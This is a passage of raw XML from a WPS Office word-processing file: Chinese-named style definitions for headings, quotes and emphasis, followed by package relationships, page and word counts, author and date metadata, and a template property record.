    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="仿宋_GB2312"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4103">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4103"/>
    <w:link w:val="style62"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="方正小标宋简体" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="44"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4104">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4104"/>
    <w:link w:val="style4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="宋体" w:eastAsia="仿宋" w:hAnsi="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4105">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4105"/>
    <w:link w:val="style5"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4106">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4106"/>
    <w:link w:val="style6"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4107">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4107"/>
    <w:link w:val="style7"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4108">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4108"/>
    <w:link w:val="style8"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4109">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4109"/>
    <w:link w:val="style9"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsia="等线 Light"/>
      <w:color w:val="595959"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4110">
    <w:name w:val="副标题 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4110"/>
    <w:link w:val="style74"/>
    <w:qFormat/>
    <w:uiPriority w:val="11"/>
    <w:rPr>
      <w:rFonts w:ascii="等线 Light" w:cs="宋体" w:eastAsia="等线 Light" w:hAnsi="等线 Light"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style180">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4111"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4111">
    <w:name w:val="引用 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4111"/>
    <w:link w:val="style180"/>
    <w:qFormat/>
    <w:uiPriority w:val="29"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style179">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style179"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4112">
    <w:name w:val="明显强调1"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4112"/>
    <w:qFormat/>
    <w:uiPriority w:val="21"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="style181">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="style0"/>
    <w:next w:val="style0"/>
    <w:link w:val="style4113"/>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13">
    <w:name w:val="明显引用 字符"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4113"/>
    <w:link w:val="style181"/>
    <w:qFormat/>
    <w:uiPriority w:val="30"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="仿宋_GB2312" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4114">
    <w:name w:val="明显参考1"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4114"/>
    <w:qFormat/>
    <w:uiPriority w:val="32"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761"/>
      <w:spacing w:val="5"/>
    </w:r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header" Target="header5.xml"/><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footer" Target="footer4.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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Words>371</Words>
  <Pages>4</Pages>
  <Characters>873</Characters>
  <Application>WPS Office</Application>
  <DocSecurity>0</DocSecurity>
  <Paragraphs>75</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>886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2024-10-09T14:58:00Z</dcterms:created>
  <dc:creator>袁超</dc:creator>
  <lastModifiedBy>V2307A</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T03:35:20Z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70b329ef8acb4dc2b0e4c98062fb58aa_23</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiOGNmNGYxYTk3YTdiODA5M2IxZjQyNWJjZWU5YTFjYjQiLCJ1c2VySWQiOiIxODcwMzY0MDI3In0=</vt:lpwstr>
  </property>
</Properties>
</file>